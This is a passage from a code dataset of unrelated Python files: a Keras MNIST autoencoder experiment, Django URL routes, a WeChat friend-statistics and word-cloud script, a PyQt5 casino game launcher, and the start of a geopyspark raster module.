main()\n","sub_path":"keyboard_snake.py","file_name":"keyboard_snake.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"368121673","text":"from keras.layers import Input, Dense, Conv2D, MaxPooling2D, UpSampling2D, Flatten, Reshape, RepeatVector,Add\nfrom keras.models import Model\nfrom keras.datasets import mnist\nfrom keras import regularizers\nimport numpy as np\nfrom keras.callbacks import TensorBoard\nimport random as rand\nimport copy\nfrom keras import backend as K\nfrom keras import metrics\nimport math\nimport matplotlib.pyplot as plt\nimport pickle\nfrom sklearn.metrics import mean_squared_error as mse\nfrom skimage.transform import rescale, resize, downscale_local_mean\n\ntrain_model = True\nfraction_of_data = 1.0\noptimizer_type = 'adadelta'\nbatch_size = 20\nnum_epochs = 5\n\ndef squared_error(a,b):\n return K.square(a-b)\nerror_function = squared_error # metrics.mse\nmin_num_data_points = 3000\nRewardError = False\nRewardBasedResampling = True\n#noisy to noisy only matters if occlude is true\nInputToOutputType = 1 #1-True to True 2-True to Noisy 3-Noisy to True 4-Noisy to Noisy\n #the other option is True input to noisy output. Noisy to Noisy makes sense only because we never truly train\n #on weaker images, we noise them , so pay less importance. if it is True to noisy, then we are learning to\n #occlude , which is not really our goal\nOcclude = InputToOutputType != 1\nSparsity = False\nArray_Error = True\nInvert_Img_Negative = False\nNegative_Error_From_Reward = False#todo set to false as default\nPredict_on_test = False\nResample = False\nif RewardBasedResampling or Occlude or Invert_Img_Negative:\n Resample = True\n\n# dict_num_reward = {0:1, 1:1, 2:1, 3:1, 4:1, 5:1, 6:1, 7:1, 8:1, 9:1}\n# dict_num_reward = {0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:0}\ndict_num_reward = {0:0, 1:1, 2:0, 3:0, 4:1, 5:0, 6:0, 7:1, 8:0, 9:0}\n# dict_num_reward = {0:0, 1:0, 2:0, 3:0.3, 4:0, 5:0, 6:0.3, 7:0, 8:1, 9:0}\n# dict_num_reward = {0:0, 1:0, 2:1, 3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:0 }\n\n\ndef get_reward_string():\n string_repr = \"_\"\n for key in dict_num_reward.keys():\n if dict_num_reward[key] != 0:\n string_repr += str(key) + str(dict_num_reward[key]).replace(\".\",\"\") + \"_\"\n return string_repr[:-1]\n #--end for\n\n\nmodel_weights_file_name = \"RECURSIVE_1_hidden_node_CNN_AE\"\nif RewardError: model_weights_file_name += \"_RewErr\"\nif Resample: model_weights_file_name += \"_Rsmpl\"\nif Sparsity: model_weights_file_name += \"_Sprs\"\nif Array_Error: model_weights_file_name += \"_ArrErr\"\nmodel_weights_file_name += \"_\" + \"inOutType\" + str(InputToOutputType)\nmodel_weights_file_name += \"_\" + optimizer_type + \"_\" + str(batch_size)\nmodel_weights_file_name += get_reward_string()\n\n# model_weights_file_name = \"CNN_ae_weights_ResampleOcclude_NoiseToNoise_148.kmdl\"\n#=============================================\n#prep the data\n(x_train,y_train) , (x_test,y_test) = mnist.load_data()\nx_train = x_train[0:int(len(x_train)*fraction_of_data)]\ny_train = y_train[0:int(len(y_train)*fraction_of_data)]\nx_train = x_train.astype('float32')/255\nx_test = x_test.astype('float32')/255\nx_train = x_train.reshape((len(x_train),28,28,1))\nx_test = x_test.reshape((len(x_test),28,28,1))\nx_train_original = copy.deepcopy(x_train)\nprint (x_train.shape)\nprint (x_test.shape)\n\n\n#=============================================\n\ndef mnist_reward(in_value):\n # for pure dict values\n return 
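Note on the autoencoder record above: the weight filename is assembled deterministically from the configuration flags plus `get_reward_string()`, which turns each non-zero reward into a `_<digit><reward-without-dot>` fragment. A quick standalone check of that suffix scheme:

```python
# Standalone sketch mirroring get_reward_string() above: non-zero rewards
# become "_<digit><reward-without-dot>" fragments; the trailing "_" is trimmed.
def reward_suffix(rewards):
    s = "_"
    for k, v in rewards.items():
        if v != 0:
            s += str(k) + str(v).replace(".", "") + "_"
    return s[:-1]

assert reward_suffix({0: 0, 1: 1, 4: 1, 7: 1}) == "_11_41_71"
assert reward_suffix({3: 0.3, 6: 0.3, 8: 1}) == "_303_603_81"
```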
dict_num_reward[in_value]\n\n#=============================================\ncumulative_reward = 0.0\nx_test_reward = np.array([mnist_reward(y_test[i]) for i in range(len(y_test))]) #this is necessary for the test set\nx_train_reward = np.array([mnist_reward(y_train[i]) for i in range(len(y_train))]) #this is necessary for the train set\nx_train_target = x_train_original\ntest_fitted_length = int(x_test.shape[0] / batch_size) * batch_size\nx_test = x_test[0:test_fitted_length]\nx_test_reward = x_test_reward[0:test_fitted_length]\n\ndef keep_sample_by_reward():\n\n global x_train_target,x_train_original,x_train_reward,y_train\n sampled_xtrain_target = []\n sampled_ytrain = []\n sampled_x_train_original = []\n sampled_x_train_reward = []\n while len(sampled_x_train_reward) < min_num_data_points:\n index_list = np.array(list(range(x_train.shape[0])))\n np.random.shuffle(index_list)\n for index in index_list:\n curr_reward = mnist_reward(y_train[index])\n if curr_reward == 0 and RewardError == True:\n continue #no point in a data point with zero reward, as the error would be 0\n # formula for (sampling) = e ^ (-1 * sum * reward) / e ^ (| sum |)\n prob_sampling = curr_reward\n # prob_sampling\n cutoff = np.random.rand()\n if cutoff < prob_sampling or RewardBasedResampling == False:\n main_image = copy.deepcopy(x_train[index])\n\n #also modify the image by adding noise based on (1-reward)\n if Occlude:\n noise_mask = np.random.rand(x_train.shape[1], x_train.shape[2], x_train.shape[3])\n noise_mask = np.less(noise_mask,1-abs(curr_reward)) # so if the noise factor was 0.4 (reward = 0.6), then\n # only those nodes where value is less than 0.4 will be 1\n noise_layer = np.random.rand(x_train.shape[1], x_train.shape[2], x_train.shape[3])# THIS is the actual noise value. DIFFERENT from the one used to generate mask\n # noise_layer = np.zeros(shape=(28, 28, 1)) #THIS is if you want the background to go to black.\n main_image = main_image*(1 - noise_mask) + noise_layer * noise_mask\n #save this\n sampled_xtrain_target.append(main_image)\n sampled_ytrain.append(y_train[index])\n sampled_x_train_reward.append(curr_reward)\n sampled_x_train_original.append(x_train_original[index])\n #---END for loop through index of data points\n #-end while loop\n #now trim to the batch size\n fitted_length = int(len(sampled_x_train_reward)/batch_size)*batch_size\n x_train_target = np.array(sampled_xtrain_target[0:fitted_length])\n x_train_original = np.array(sampled_x_train_original[0:fitted_length])\n x_train_reward = np.array(sampled_x_train_reward[0:fitted_length])\n y_train = np.array(sampled_ytrain[0:fitted_length])\n\n\n#=============================\n\nif Resample and train_model:\n keep_sample_by_reward()\nelse: #dont resample\n x_train_target = x_train_original\n pass\n#=============================\n\n\nx_test_approx = np.zeros(x_test.shape)\nx_test_target = copy.deepcopy(x_test)\nx_train_approx = np.zeros(x_train_original.shape)\n\n# encoding_dim = 32\ninput_img = Input(shape=(28,28,1))\nprev_approx_img = Input(shape=(28,28,1))\ntarget_img = Input(shape=(28,28,1))\n\n\"\"\"\nNN design algo\nThere are many repeat NN, each trained sequentially.\n1) Train v1, evaluate the results for the dataset.\n2) subtract the original dataset with the evaluated results. \n3) Save v1 weights with _v1 suffix\n4) Reset the weights (? 
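Note on `keep_sample_by_reward` above: the occlusion step makes two independent uniform draws — one array, thresholded at `1 - |reward|`, decides *which* pixels to occlude, while a second array supplies the *values* written there — and blends them as `img*(1-mask) + noise*mask`. A standalone sketch isolating just that blend (the 28×28×1 shape is MNIST's, as in the record):

```python
# Standalone sketch of the occlusion blend above; the (1 - |reward|) noise
# fraction follows the original code.
import numpy as np

def occlude(img, reward, rng=np.random):
    frac_noise = 1 - abs(reward)                 # low reward -> more noise
    mask = rng.rand(*img.shape) < frac_noise     # True where noise is written
    noise = rng.rand(*img.shape)                 # independent noise values
    return img * (1 - mask) + noise * mask       # boolean mask acts as 0/1

out = occlude(np.zeros((28, 28, 1)), reward=0.6)
frac = (out != 0).mean()                         # ~40% of pixels became noise
assert 0.25 < frac < 0.55
```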
or not) and train the model on the modified dataset.\n5) Repeat\n\nDebug by looking at the resultant images wrt to the original or prev data set.\nDebug by only training on 8s to begin with.\n\"\"\"\n\nx = Conv2D(8,(2,2),activation='tanh')(input_img)\n\nflat_layer = Flatten()(x)\ndense_layer = Dense(1, activation=\"tanh\")(flat_layer)\n\ndense_feature_layer = Dense(int(14*14),activation=\"tanh\")(dense_layer)\nencoded = Reshape([14,14,1])(dense_feature_layer)\nx = Conv2D(8,(2,2),activation='tanh',padding=\"same\")(encoded)\nx = UpSampling2D((2,2))(x)\ndecoded = Conv2D(1,(2,2),activation='tanh',padding='same')(x)\ndecoded = Add()([decoded,prev_approx_img])\n\n\n#todo revisit good performing network\n# x = Conv2D(8,(2,2),activation='tanh')(input_img)\n#\n# flat_layer = Flatten()(x)\n# dense_layer = Dense(1, activation=\"tanh\")(flat_layer)\n#\n# dense_feature_layer = Dense(int(28*28),activation=\"tanh\")(dense_layer)\n# encoded = Reshape([28,28,1])(dense_feature_layer)\n# x = Conv2D(8,(2,2),activation='tanh',padding=\"same\")(encoded)\n# decoded = Conv2D(1,(2,2),activation='tanh',padding='same')(x)\n# decoded = Add()([decoded,prev_approx_img])\n\n\n#todo revisit model without bias\n# x = Conv2D(8,(2,2),activation='tanh',use_bias=False)(input_img)\n#\n# # x = MaxPooling2D((2,2),padding='same')(x)\n# # x = Conv2D(8,(2,2),activation='tanh')(x)\n# # x = MaxPooling2D((2,2),padding='same')(x)\n# # x = Conv2D(8,(2,2),activation='tanh')(x)\n#\n# flat_layer = Flatten()(x)\n# dense_layer = Dense(1, activation=\"tanh\",use_bias=False)(flat_layer)\n#\n# dense_feature_layer = Dense(int(28*28),activation=\"tanh\",use_bias=False)(dense_layer)\n# encoded = Reshape([28,28,1])(dense_feature_layer)\n# x = Conv2D(8,(2,2),activation='tanh',padding=\"same\",use_bias=False)(encoded)\n# decoded = Conv2D(1,(2,2),activation='tanh',padding='same',use_bias=False)(x)\n# decoded = Add()([decoded,prev_approx_img])\n\n\n\n\nif Array_Error:\n loss_value = error_function(target_img,decoded)\nelse: # not array error\n loss_value = K.mean(error_function(target_img, decoded))\n\nautoencoder = Model([input_img,prev_approx_img,target_img], decoded)\nautoencoder.add_loss(loss_value)\nautoencoder.compile(optimizer=optimizer_type)\n\n\n#encoder model\nencoder = Model (input_img,encoded)\n#decoder model\n\n\n#find the indices of two of each class\n# needed_numbers = [0,1,2,3,4,5,6,7,8,9]\n# needed_numbers = [0,0,1,1,2,2,3,3,4,4,5,5,6,6,7,7,8,8,9,9]\n# needed_numbers = [8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8]\n# needed_numbers = [5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5]\n# needed_numbers = [7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7]\n# needed_numbers = [4,4,4,4,4,4,4,4,4,1,1,1,1,1,8,8,8,8,8,8]\nneeded_numbers = [i for i in dict_num_reward.keys() if dict_num_reward[i]>0]\nneeded_numbers = needed_numbers * 20 #this will be more than the images, but thats ok. There are checks in place to break out\ntarget_indices = []\ncurr_index = rand.randint(100,1000)\n\n\ny_target = y_train\nsource_images = x_train_target\nif Predict_on_test:\n y_target = y_test\n source_images = x_test\nfor number in needed_numbers:\n while True:\n curr_index += 1\n if curr_index % len(y_target ) == 0:\n curr_index = 0\n break\n if y_target[curr_index] == number:\n target_indices.append(curr_index)\n break\n #end while\n#end outer for\n\n\nif not train_model:\n pass#todo fill the iterative load and evaluate here as well. 
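Note on the network above: each stage squeezes the image through a single-unit `Dense(1)` bottleneck and emits a correction that `Add()` folds into `prev_approx`; because the loss compares `correction + prev_approx` against the fixed target, each stage is effectively fit to the current residual. A toy numpy illustration of why the stacked-stage error shrinks (assumptions: scalar "stages", each stand-in stage recovers half the residual):

```python
# Toy sketch of the residual scheme above: output_k = c_k + prev_approx, with
# the target held fixed, is the same as fitting c_k to target - prev_approx.
import numpy as np

target = np.array([3.0, -1.0, 2.0])
approx = np.zeros_like(target)
for stage in range(6):                   # six stages, as in the loop below
    residual = target - approx          # what Add() + fixed target implies
    correction = 0.5 * residual         # stand-in for one trained stage
    approx = correction + approx        # becomes prev_approx next stage
print(np.abs(target - approx).max())    # error shrinks geometrically (0.5**6)
```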
OR BETTER create many copies of the model and load\n # autoencoder.load_weights(filepath=model_weights_file_name)\nelse:\n # InputToOutputType = 4 # 1-True to True 2-True to Noisy 3-Noisy to True 4-Noisy to Noisy\n # x_train_original, x_train_target\n source_images = x_train_original\n target_images = x_train_original\n if InputToOutputType == 2:\n target_images = x_train_target\n if InputToOutputType == 3 or InputToOutputType == 4:\n source_images = x_train_target\n\n #todo THINK IF THIS IS GOOD. I think it is, so all the AE units start with the same weights (connected)\n autoencoder.save_weights(\"default_init_weights.kmdl\")\n output_images_iter_list = []\n output_images_testSet_iter_list = []\n\n if train_model == False:\n for i in range(3):\n #todo complete this code. It should not be here, only when predicting\n autoencoder.load_weights(model_weights_file_name + \"_L\" + str(i) + \".kmdl\")\n\n\n else:\n for i in range(6):\n autoencoder.load_weights(\"default_init_weights.kmdl\")\n if RewardError:\n pass\n else:\n autoencoder.fit([source_images,x_train_approx,target_images],epochs=num_epochs ,batch_size=batch_size,\n shuffle=True,validation_data=([x_test,x_test_approx,x_test_target],None))\n autoencoder.save_weights(model_weights_file_name+\"_L\"+str(i)+\".kmdl\")\n #now update the data for the next iteration.\n output_images = autoencoder.predict([source_images,x_train_approx,target_images])\n output_images_testSet = autoencoder.predict([x_test,x_test_approx,x_test])\n # output_images_iter_list.append(output_images)\n # output_images_testSet_iter_list.append(output_images_testSet)\n x_train_approx = output_images # todo NOTE: do NOT compound the images, else the error of the first image adds on.\n # source_images = source_images - output_images # keep target images the same\n source_images = source_images # keep target images the same\n\n x_test_approx = output_images_testSet\n # x_test = x_test - output_images_testSet\n x_test = x_test\n\n # n = 20 # number of images to be displayed\n # plt.figure(figsize=(20, 4))\n # plt.suptitle(model_weights_file_name)\n # for i in range(n):\n # if i >= len(target_indices):\n # break\n # ax = plt.subplot(2, n, i + 1)\n #\n # plt.imshow(source_images[target_indices[i]].reshape(x_train.shape[1], x_train.shape[2]))\n #\n # plt.gray()\n # ax.get_xaxis().set_visible(False)\n # ax.get_yaxis().set_visible(True) # just for fun\n # # display reconstruction\n # ax = plt.subplot(2, n, i + 1 + n)\n # plt.imshow(output_images[target_indices[i]].reshape(x_train.shape[1], x_train.shape[2]))\n # # a = source_images[target_indices[i]].reshape(source_images[0].shape[:-1])\n # # b = decoded_imgs[target_indices[i]].reshape(source_images[0].shape[:-1])\n # # final_mse = mse(a,b)\n # # plt.title(\"mse=\", str(final_mse))\n # plt.gray()\n # ax.get_xaxis().set_visible(False)\n # ax.get_yaxis().set_visible(False)\n # plt.show()\n\n\ndecoded_imgs = output_images_iter_list[0]\nfor delta_set in output_images_iter_list[1:]:\n decoded_imgs += delta_set\n\n\nn=20 #number of images to be displayed\nplt.figure(figsize=(20,4))\nplt.suptitle(model_weights_file_name)\n\nfor i in range(n):\n if i >= len(target_indices):\n break\n ax = plt.subplot(2,n,i+1)\n\n\n plt.imshow(source_images[target_indices[i]].reshape(x_train.shape[1], x_train.shape[2]))\n\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(True)#just for fun\n #display reconstruction\n ax = plt.subplot(2,n,i+1+n)\n plt.imshow(decoded_imgs[target_indices[i]].reshape(x_train.shape[1], 
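One hedged reading of the training loop above: the two `append(...)` calls that feed `output_images_iter_list` are commented out, so the list stays empty and the `output_images_iter_list[0]` access after the loop would raise `IndexError`. Note also that each stage's `predict` output already folds in `prev_approx` through the `Add()` layer, so the saved outputs are cumulative approximations rather than deltas; summing them as deltas would double-count earlier stages.

```python
# Sketch of the simplest fix consistent with that reading: each stage's output
# already includes the previous approximation, so the final reconstruction is
# just the last stage's prediction.
decoded_imgs = x_train_approx          # holds the last predict() result
```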
x_train.shape[2]))\n # a = source_images[target_indices[i]].reshape(source_images[0].shape[:-1])\n # b = decoded_imgs[target_indices[i]].reshape(source_images[0].shape[:-1])\n # final_mse = mse(a,b)\n # plt.title(\"mse=\", str(final_mse))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\nplt.show()\n","sub_path":"Autoencoders/AE_modulations/Recurs_Single_hidden_node_feature_MNIST.py","file_name":"Recurs_Single_hidden_node_feature_MNIST.py","file_ext":"py","file_size_in_byte":14961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534912622","text":"# standard libraris\nfrom django.urls import include, path\n\"\"\"\nApi urls registration for user, auth, and books aplication\n\"\"\"\nurlpatterns = [\n path('users/', include('users.urls')),\n path('rest-auth/', include('rest_auth.urls')),\n path('rest-auth/registration/', include('rest_auth.registration.urls')),\n path('books/', include('books.urls'))\n]","sub_path":"backend/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"382859290","text":"import itchat\nimport numpy as np\nimport pandas as pd\nfrom collections import defaultdict\nimport re\nimport jieba\nimport os\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom wordcloud import WordCloud,ImageColorGenerator\nimport PIL.Image as Image\n\n# 微信登陆,会跳出二维码,手机微信扫码登陆即可\nitchat.login()\nfriends = itchat.get_friends(update=True)\n# 获取自己的昵称,自己的索引为0\nmyNickName = friends[0].NickName\n# 建立以昵称为文件名的文件夹\nisExist = os.path.exists(myNickName)\nif not isExist:\n os.mkdir(myNickName)\n\n# file = '\\{}'.format(NickName)\nfile = '\\%s' %myNickName\n# 获得当前路径\ncp = os.getcwd()\n# 路径拼接\npath = os.path.join(cp + file)\n# 切换路径\nos.chdir(path)\n\nnumber_of_friends = len(friends)\nprint(number_of_friends)\n# 将friends转换为pandas DataFrame格式\ndf_friends = pd.DataFrame(friends)\n\n# 获得朋友性别数,获得男、女性别数\ndef get_sex_count(Sequence):\n counts = defaultdict(int)\n for x in Sequence:\n counts[x] += 1\n return counts\n\nSex = df_friends.Sex\nprint(Sex)\n# Sex_count1为一个字典\nSex_count1 = get_sex_count(Sex)\nprint(Sex_count1)\n# pandas为Series提供了一个value_counts()方法,可以更方便统计各项出现的次数\nSex_count2 = Sex.value_counts()\nprint(Sex_count2)\n\n# 获得省份信息\nProvince = df_friends.Province\nProvinde_count = Province.value_counts()\nProvinde_count = Provinde_count[Provinde_count.index != '']\nprint(Provinde_count)\n\n# 获得城市信息\nCity = df_friends.City\nCity_count = City.value_counts()\nCity_count = City_count[City_count.index != '']\nprint(City_count)\n\n# 画柱状图\ndef plot_bar_sex(x,y):\n # 设置中文字体和负号正常显示\n matplotlib.rcParams['font.sans-serif'] = ['SimHei']\n matplotlib.rcParams['axes.unicode_minus'] = False\n plt.figure()\n # plt.bar(sex_count1.keys(),sex_count1.values())\n plt.bar(x,y)\n plt.savefig(path + '\\\\sexFigure.jpg')\n plt.show()\n\n# 将朋友地理信息写入txt\ndef write_name_all(myNickName, Sex_count2, Provinde_count, City_count):\n file_name_all = myNickName + '_basic_inf.txt'\n write_file = open(path + '\\\\' + file_name_all, 'w')\n write_file.write(\n '你共有%d个好友,其中有%d个男生,%d个女生,%d未显示性别。\\n\\n' % (number_of_friends, Sex_count2[1], Sex_count2[2], Sex_count2[0]) +\n '你的朋友主要来自省份:%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)和%s(%d人)。\\n\\n' % (\n Provinde_count.index[0], Provinde_count[0], Provinde_count.index[1], Provinde_count[1], Provinde_count.index[2],\n Provinde_count[2], Provinde_count.index[3], Provinde_count[3], Provinde_count.index[4], 
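Note on the WeChat record above: it counts genders twice, once with a `defaultdict` tally and once with pandas' `Series.value_counts()`, and the record itself observes the latter is the more convenient path. A small standalone equivalence check:

```python
# Standalone sketch: the two counting paths used above produce the same
# tallies; value_counts() additionally sorts by frequency.
from collections import defaultdict
import pandas as pd

values = pd.Series([1, 2, 2, 0, 1, 1])
counts = defaultdict(int)
for v in values:
    counts[v] += 1

vc = values.value_counts()
assert counts == {1: 3, 2: 2, 0: 1}
assert vc[1] == 3 and vc[2] == 2 and vc[0] == 1
```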
Provinde_count[4]) +\n '主要来自这些城市:%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)、%s(%d人)和%s(%d人)。' % (\n City_count.index[0], City_count[0], City_count.index[1], City_count[1], City_count.index[2], City_count[2],\n City_count.index[3], City_count[3], City_count.index[4], City_count[4], City_count.index[5], City_count[5],\n City_count.index[6], City_count[6], City_count.index[7], City_count[7], City_count.index[8], City_count[8],\n City_count.index[9], City_count[9]))\n write_file.close()\n\nplot_bar_sex(['男','女','不详'], Sex_count2)\nwrite_name_all(myNickName, Sex_count2, Provinde_count, City_count)\n\n# 获得并处理 微信签名\nSignatures = df_friends.Signature\n# 匹配表情\nregex1 = re.compile('')\n# 匹配两个及以上任意非空字符\nregex2 = re.compile('\\s{2,}')\n# 用一个空格替换表情和多个空格\n# sub(pattern,repl,string)实现将一个字符串中所有符合正则表达式的子串进行替换\nSignatures = [regex2.sub(' ',regex1.sub('',signature,re.S)) for signature in Signatures]\nSignatures = [signature.replace('\\n',' ') for signature in Signatures]\nSignatures = [signature for signature in Signatures if len(signature)>0]\n\nprint(Signatures)\ntext_Signatures = ''.join(Signatures)\nprint(' ---------- ')\nprint(text_Signatures)\nfile_signatures = myNickName + '_wechat_signatures.txt'\nfile_signatures = path + '\\\\' + file_signatures\nwith open(file_signatures, 'w', encoding='utf-8') as f:\n f.write(text_Signatures)\n f.close()\n\nsigt_word_list = jieba.cut(text_Signatures,cut_all=True)\nword_space_split = '/'.join(sigt_word_list)\nprint(' ------ ')\nprint(word_space_split)\n\n# coloring = np.array(Image.open(path + '\\\\' + 'background.jpg'))\n#生成词云。font_path=\"C:\\Windows\\Fonts\\msyhl.ttc\"指定字体,有些字e不能解析中文,这种情况下会出现乱码。\nmy_wordcloud = WordCloud(background_color=\"white\", max_words=2000, max_font_size=60, random_state=42, scale=2,\n font_path=\"E:/GitCode/useAndLearnCode/spideruse/wechat/Figo/HYZhengYuan-75W-2.otf\").generate(word_space_split)\n\nfile_name_p = myNickName + '_word.jpg'\nfile_name_p = path + '\\\\' + file_name_p\n#保存图片\nmy_wordcloud.to_file(file_name_p)","sub_path":"spideruse/wechat/wechatTutorial.py","file_name":"wechatTutorial.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"487388631","text":"import sys,re\nfrom PyQt5 import uic, QtWidgets, QtGui\n\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PIL import Image\nqtCreatorFile = \"./Interfaz_Principal/Main.ui\" # Nombre del archivo aquí.\nplotImg = './Interfaz_Principal/Captura.jpg'\nUi_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)\nfrom Juego1 import Ruleta\nfrom Juego2 import Altos_o_Bajos_Codificacionado\nfrom Juego3 import LootBoxGame\nfrom Juego4 import SuperTragaPerras\nfrom Juego5 import CapsUI\nfrom Juego6 import casino\nfrom Juego7 import keno\nfrom Juego8 import Jackpot\nfrom Recarga import menu\n\nimport bd\nfrom PyQt5.QtChart import QChart, QChartView, QLineSeries\nfrom PyQt5.QtCore import QPointF\nfrom PyQt5.QtGui import QPainter\nfrom PyQt5.QtCore import Qt,QThread, pyqtSignal\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nclass MainW(QtWidgets.QMainWindow, Ui_MainWindow):\n def __init__(self):\n QtWidgets.QMainWindow.__init__(self)\n Ui_MainWindow.__init__(self)\n self.setupUi(self)\n self.showMaximized()\n \n self.imagen.setText(\"aaaaaaa\")\n myimg = QtGui.QPixmap(plotImg)\n self.imagen.setPixmap(myimg)\n self.Juego1.clicked.connect(self.runjuego1)\n self.Juego2.clicked.connect(self.runjuego2)\n self.Juego3.clicked.connect(self.runjuego3)\n 
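Two hedged observations on the signature-cleaning code above: `regex1 = re.compile('')` compiles an empty pattern (the emoji-stripping pattern appears to have been lost), so its `sub()` leaves text unchanged; and `regex1.sub('', signature, re.S)` passes `re.S` where `Pattern.sub` expects a *count*, capping replacements at 16. A minimal standalone pass over the same jieba-plus-WordCloud pipeline (the font path is a placeholder — WordCloud needs a CJK-capable font file to render Chinese):

```python
# Standalone sketch of the pipeline above: clean whitespace, join signatures,
# segment with jieba, render a word cloud. "simhei.ttf" is a placeholder path.
import re
import jieba
from wordcloud import WordCloud

signatures = ["热爱生活  每天进步", "keep calm\nand code"]
clean = [re.sub(r"\s{2,}", " ", s.replace("\n", " ")) for s in signatures]
text = " ".join(clean)

words = "/".join(jieba.cut(text, cut_all=True))
wc = WordCloud(background_color="white", max_words=200,
               font_path="simhei.ttf")        # placeholder font path
wc.generate(words).to_file("signatures.png")
```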
self.Juego4.clicked.connect(self.runjuego4)\n self.Juego5.clicked.connect(self.runjuego5)\n self.Juego6.clicked.connect(self.runjuego6)\n self.Juego7.clicked.connect(self.runjuego7)\n self.Juego8.clicked.connect(self.runjuego8)\n self.setupgraph()\n self.updatechart()\n self._actualizar.clicked.connect(self.updatechart)\n\n self._recargar.clicked.connect(self.recargar)\n def runjuego1(self):\n self.window = Ruleta.UIWindow()\n self.window.show()\n def runjuego2(self):\n self.window = Altos_o_Bajos_Codificacionado.MainWindow()\n self.window.show()\n def runjuego3(self):\n self.window = LootBoxGame.MyApp()\n self.window.show()\n def runjuego4(self):\n self.window = SuperTragaPerras.UIWindow()\n self.window.show()\n def runjuego5(self):\n self.window = CapsUI.UIWindow()\n self.window.show()\n def runjuego6(self):\n self.window = casino.MyApp()\n self.window.show()\n def runjuego7(self):\n self.window = keno.UIWindow()\n self.window.show()\n def runjuego8(self):\n self.window = Jackpot.UIWindow()\n self.window.show()\n def recargar(self):\n self.window = menu.MyApp()\n self.window.show()\n\n\n def setupgraph(self):\n self.chart = QChart()\n self.chart.createDefaultAxes()\n self.chart.setAnimationOptions(QChart.SeriesAnimations)\n self.chart.setTitle(\"Saldo vs Tiempo\")\n self.chart.legend().setVisible(True)\n self.chart.legend().setAlignment(Qt.AlignBottom)\n self.chartview = QChartView(self.chart)\n self.chartview.setRenderHint(QPainter.Antialiasing)\n self._graphlayout.addWidget(self.chartview)\n def updatechart(self):\n self.series = QLineSeries(self)\n self.datos = bd.getData()\n self.c = 0\n for x in self.datos:\n self.series.append(self.c,x)\n self.c+=1\n self.chart.removeAllSeries()\n self.chart.addSeries(self.series)\n self.chart.createDefaultAxes()\n\n def create_linechart(self):\n\n self.series = QLineSeries(self)\n self.datos = bd.getData()\n self.c = 0\n for x in self.datos:\n self.series.append(self.c,x)\n self.c+=1\n self.chart = QChart()\n self.chart.addSeries(self.series)\n self.chart.createDefaultAxes()\n self.chart.setAnimationOptions(QChart.SeriesAnimations)\n self.chart.setTitle(\"Saldo vs Tiempo\")\n self.chart.legend().setVisible(True)\n self.chart.legend().setAlignment(Qt.AlignBottom)\n self.chartview = QChartView(self.chart)\n self.chartview.setRenderHint(QPainter.Antialiasing)\n self._graphlayout.addWidget(self.chartview)\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n window = MainW()\n window.show()\n sys.exit(app.exec_())","sub_path":"Codigo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"631839050","text":"'''\nThis module contains the RasterRDD and the TiledRasterRDD classes. Both of these classes are\nwrappers of their scala counterparts. 
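Note on the PyQt5 record above: `updatechart` refreshes the plot by rebuilding a `QLineSeries` from the database, dropping the old series, re-attaching the new one, and regenerating the axes so their ranges track the data; `create_linechart` duplicates most of `setupgraph` plus `updatechart` and appears unused. A condensed sketch of just the refresh pattern (assumes a running Qt application and an existing `QChart`, as in the record):

```python
# Sketch of the refresh pattern above: fresh series in, old series out,
# default axes regenerated so they rescale to the new data.
from PyQt5.QtChart import QLineSeries

def refresh(chart, samples):
    series = QLineSeries()
    for i, value in enumerate(samples):
        series.append(i, value)          # x = sample index, y = balance
    chart.removeAllSeries()              # discard the previous plot
    chart.addSeries(series)
    chart.createDefaultAxes()            # rescale axes to the new series
```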
These will be used in leau of actual PySpark RDDs when\nperforming operations.\n'''\nimport json\nimport shapely.wkt\n\nfrom shapely.geometry import Polygon\nfrom shapely.wkt import dumps\nfrom geopyspark.geotrellis.constants import (RESAMPLE_METHODS,\n OPERATIONS,\n NEIGHBORHOODS,\n NEARESTNEIGHBOR,\n FLOAT,\n TILE,\n SPATIAL,\n LESSTHANOREQUALTO\n )\n\ndef _reclassify(srdd, value_map, data_type, boundary_strategy):\n new_dict = {}\n\n for key, value in value_map.items():\n if not isinstance(key, data_type):\n val = value_map[key]\n for k in key:\n new_dict[k] = val\n else:\n new_dict[key] = value\n\n if data_type is int:\n return srdd.reclassify(new_dict, boundary_strategy)\n else:\n return srdd.reclassifyDouble(new_dict, boundary_strategy)\n\n\nclass RasterRDD(object):\n \"\"\"A RDD that contains GeoTrellis rasters.\n\n Represents a RDD that contains (K, V). Where K is either ProjectedExtent or\n TemporalProjectedExtent depending on the `rdd_type` of the RDD, and V being a raster.\n\n Args:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n srdd (JavaObject): The coresponding scala class. This is what allows RasterRDD to access\n the various scala methods.\n\n Attributes:\n geopysc (GeoPyContext): The GeoPyContext being used this session.\n rdd_type (str): What the spatial type of the geotiffs are. This is\n represented by the constants: `SPATIAL` and `SPACETIME`.\n srdd 